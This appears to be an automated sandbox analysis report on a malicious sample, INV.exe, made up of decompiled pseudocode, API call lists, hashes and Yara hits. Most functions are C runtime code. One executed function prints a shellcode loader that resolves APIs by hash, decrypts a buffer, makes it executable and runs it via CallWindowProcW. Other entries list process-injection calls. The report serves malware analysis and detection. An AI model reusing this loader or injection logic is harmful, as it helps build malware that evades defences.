                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                        0x01072f84
                                        0x01072f8a
                                        0x01072ffd
                                        0x00000000
                                        0x01072f91
                                        0x01072f91
                                        0x01072f94
                                        0x01072faf
                                        0x01072fb2
                                        0x01072fd2
                                        0x01072fe4
                                        0x01072fb4
                                        0x01072fb4
                                        0x01072fb7
                                        0x00000000
                                        0x01072fb9
                                        0x01072fcb
                                        0x01072fcb
                                        0x01072fb7
                                        0x01073002
                                        0x01073006
                                        0x01072f96
                                        0x01072fae
                                        0x01072fae
                                        0x01072f94

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010687A1, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0x107cf38);
				E010627F0(__ebx, __edi, __esi);
				_t28 = E010615FE();
				_t40 = E010632EE(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E010636DB(_t28, __edx, 1, _t40, __eflags);
					E01063AF6(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E01063117(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E0106344C( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E01068E70();
					E01063117(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E01068E7C();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
					_t24 = 0;
				}
				return E01062835(_t24);
			}







                                        0x01068dd6
                                        0x01068dd8
                                        0x01068ddd
                                        0x01068de7
                                        0x01068df6
                                        0x01068df8
                                        0x01068dfb
                                        0x01068dfd
                                        0x01068e0e
                                        0x01068e13
                                        0x01068e1b
                                        0x01068e20
                                        0x01068e25
                                        0x01068e2b
                                        0x01068e31
                                        0x01068e37
                                        0x01068e3e
                                        0x01068e45
                                        0x01068e4b
                                        0x01068e51
                                        0x01068e55
                                        0x01068e56
                                        0x01068e5d
                                        0x01068e62
                                        0x01068dff
                                        0x01068e04
                                        0x01068e0a
                                        0x01068e0a
                                        0x01068e69

                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: INV.exe PID: 6348 Parent PID: 7140 INV.exeCOMMON

                                        Executed Functions

                                        Function 01077800, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t48;
				void* _t49;
				signed char _t50;
				intOrPtr* _t56;
				void* _t85;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
				_t44 =  *_t40(0); // executed
				 *_t43(_t44);
				_t18 =  &_v40; // 0x72637052
				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
				_t87 = 0;
				if(_t49 != 0 && _t49 == 0x57) {
					_t50 = 0;
					do {
						_t20 = 0x107f0d0 + _t50; // 0x17e1e9
						asm("rol dl, 0x2");
						asm("ror dl, 0x3");
						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
						_t50 = _t50 + 1;
					} while (_t50 < 0x1e05);
					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16); // executed
					CallWindowProcW(0x107f0d0, 0x1080ed8, 0, 0, 0);
					return E01077D10(_t87);
				}
				return _t49;
			}
























                                        0x01077809
                                        0x01077810
                                        0x01077817
                                        0x0107781d
                                        0x01077821
                                        0x01077828
                                        0x0107782f
                                        0x01077835
                                        0x01077858
                                        0x0107785a
                                        0x0107786c
                                        0x01077889
                                        0x01077890
                                        0x0107789d
                                        0x010778a6
                                        0x010778a9
                                        0x010778ab
                                        0x010778b8
                                        0x010778cb
                                        0x010778cd
                                        0x010778d2
                                        0x010778d9
                                        0x010778e0
                                        0x010778e0
                                        0x010778ec
                                        0x010778f4
                                        0x0107790e
                                        0x01077914
                                        0x01077915
                                        0x0107792c
                                        0x01077942
                                        0x00000000
                                        0x01077945
                                        0x0107794d

                                        APIs
                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 010778A6
                                        • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 010778CB
                                        • VirtualProtect.KERNELBASE(0107F0D0,00001E05,00000040,?), ref: 0107792C
                                        • CallWindowProcW.USER32(0107F0D0,01080ED8,00000000,00000000,00000000), ref: 01077942
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 546183053-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061DCF, Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x107cd50);
				E010627F0(__ebx, __edi, __esi);
				E01063117(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E010632EE();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x10bfd20 = _t82;
					 *0x10c1b28 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x10bfd20; // 0x14b47c0
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x10bfd20;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x10c1a80; // 0x14b55f8
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91); // executed
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -17562900
											E01062D36(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E0106207A();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E01062835(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x10c1b28 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E010632EE(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x10bfd20[_t149] = _t138;
							 *0x10c1b28 =  *0x10c1b28 + _t141;
							__eflags =  *0x10c1b28;
							while(1) {
								__eflags = _t138 - 0x800 + 0x10bfd20[_t149];
								if(_t138 >= 0x800 + 0x10bfd20[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x10c1b28; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x10bfd20[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E01062D36(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                        0x01061dcf
                                        0x01061dd1
                                        0x01061dd6
                                        0x01061ddd
                                        0x01061de5
                                        0x01061de8
                                        0x01061dec
                                        0x01061ded
                                        0x01061dee
                                        0x01061df5
                                        0x01061df7
                                        0x01061dfc
                                        0x01061e19
                                        0x01061e1e
                                        0x01061e24
                                        0x01061e29
                                        0x01061e2b
                                        0x00000000
                                        0x00000000
                                        0x01061e2d
                                        0x01061e33
                                        0x01061e36
                                        0x01061e39
                                        0x01061e42
                                        0x01061e45
                                        0x01061e4b
                                        0x01061e4e
                                        0x01061e51
                                        0x01061e54
                                        0x01061e57
                                        0x01061e57
                                        0x01061e62
                                        0x01061e68
                                        0x01061e6d
                                        0x01061fa2
                                        0x01061fa4
                                        0x01061fa5
                                        0x01061fa5
                                        0x01061fa5
                                        0x01061fa7
                                        0x01061fa7
                                        0x01061faa
                                        0x01061fad
                                        0x00000000
                                        0x00000000
                                        0x01061fb8
                                        0x01061fbe
                                        0x01061fc1
                                        0x01061fc4
                                        0x01061fd8
                                        0x01061fd8
                                        0x01061fdc
                                        0x01061fde
                                        0x01061fe5
                                        0x01061fea
                                        0x01061fec
                                        0x01061fec
                                        0x01061fe0
                                        0x01061fe2
                                        0x01061fe2
                                        0x01061ff0
                                        0x01061ff6
                                        0x01061ff9
                                        0x01061ffc
                                        0x0106204a
                                        0x01062050
                                        0x01062053
                                        0x01062055
                                        0x0106205a
                                        0x0106205c
                                        0x01062061
                                        0x01062061
                                        0x00000000
                                        0x01061ffe
                                        0x01061ffe
                                        0x01062000
                                        0x00000000
                                        0x00000000
                                        0x01062003
                                        0x01062009
                                        0x0106200b
                                        0x00000000
                                        0x00000000
                                        0x01062010
                                        0x01062012
                                        0x01062017
                                        0x0106201a
                                        0x01062024
                                        0x01062027
                                        0x01062032
                                        0x01062039
                                        0x0106203d
                                        0x01062042
                                        0x01062045
                                        0x01062064
                                        0x01062064
                                        0x00000000
                                        0x01062064
                                        0x0106202d
                                        0x0106202d
                                        0x0106202f
                                        0x0106202f
                                        0x00000000
                                        0x0106202f
                                        0x01062020
                                        0x00000000
                                        0x01062020
                                        0x01061ffc
                                        0x01061fc6
                                        0x01061fc8
                                        0x00000000
                                        0x00000000
                                        0x01061fd0
                                        0x00000000
                                        0x01061fd0
                                        0x0106206a
                                        0x0106206d
                                        0x01062072
                                        0x01062072
                                        0x01062074
                                        0x01062079
                                        0x01062079
                                        0x01061e73
                                        0x01061e76
                                        0x01061e78
                                        0x00000000
                                        0x00000000
                                        0x01061e7e
                                        0x01061e80
                                        0x01061e83
                                        0x01061e86
                                        0x01061e8b
                                        0x01061e93
                                        0x01061e95
                                        0x01061e97
                                        0x01061e99
                                        0x01061e99
                                        0x01061e9e
                                        0x01061e9e
                                        0x01061e9f
                                        0x01061ea2
                                        0x01061ea2
                                        0x01061ea8
                                        0x00000000
                                        0x00000000
                                        0x01061eb4
                                        0x01061eb6
                                        0x01061eb9
                                        0x01061ebb
                                        0x01061f55
                                        0x01061f5c
                                        0x01061f5c
                                        0x01061f62
                                        0x01061f6e
                                        0x01061f70
                                        0x00000000
                                        0x00000000
                                        0x01061f72
                                        0x01061f78
                                        0x01061f7b
                                        0x01061f7e
                                        0x01061f82
                                        0x01061f88
                                        0x01061f8b
                                        0x01061f8e
                                        0x01061f91
                                        0x01061f91
                                        0x01061f96
                                        0x01061f97
                                        0x01061f9a
                                        0x00000000
                                        0x01061f9a
                                        0x01061ec1
                                        0x01061ec7
                                        0x00000000
                                        0x01061ec7
                                        0x01061eca
                                        0x01061ecc
                                        0x01061ed1
                                        0x01061ed2
                                        0x01061ed5
                                        0x01061ed8
                                        0x01061ed8
                                        0x01061eda
                                        0x00000000
                                        0x00000000
                                        0x01061ee0
                                        0x01061ee2
                                        0x01061ee5
                                        0x01061f42
                                        0x01061f42
                                        0x01061f43
                                        0x01061f49
                                        0x01061f4a
                                        0x01061f4d
                                        0x01061f50
                                        0x00000000
                                        0x01061f50
                                        0x01061ee7
                                        0x01061ee9
                                        0x00000000
                                        0x00000000
                                        0x01061eeb
                                        0x01061eed
                                        0x01061eef
                                        0x00000000
                                        0x00000000
                                        0x01061ef1
                                        0x01061ef3
                                        0x01061f03
                                        0x01061f10
                                        0x01061f17
                                        0x01061f1c
                                        0x01061f23
                                        0x01061f2d
                                        0x01061f31
                                        0x01061f36
                                        0x01061f39
                                        0x01061f39
                                        0x01061f39
                                        0x01061f3c
                                        0x01061f3f
                                        0x01061f3f
                                        0x00000000
                                        0x01061f3f
                                        0x01061ef6
                                        0x01061efc
                                        0x01061eff
                                        0x01061f01
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01061f01
                                        0x00000000
                                        0x01061ed8
                                        0x01061e11
                                        0x00000000

                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0107F677, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0107F73D
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F767
                                        • ReadFile.KERNELBASE(00000000,00000000,0107FCD3,?,00000000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E), ref: 0107F77E
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F7A0
                                        • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01080190), ref: 0107F812
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 0107F81D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3,00000000), ref: 0107F868
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction ID: e1c66225a2a266d1f0fcb884e952f3013b77754b6f05dd7527a641889c235f78
                                        • Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction Fuzzy Hash: 64518171E0532AABDB509FB8CC84FAEBBB8EF18710F144469F591F7280D67099018768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0107F0DC, Relevance: 6.3, APIs: 4, Instructions: 335threadprocessinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 0107F206
                                        • GetThreadContext.KERNELBASE(?,?), ref: 0107F225
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107F245
                                        • SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 0107F402
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
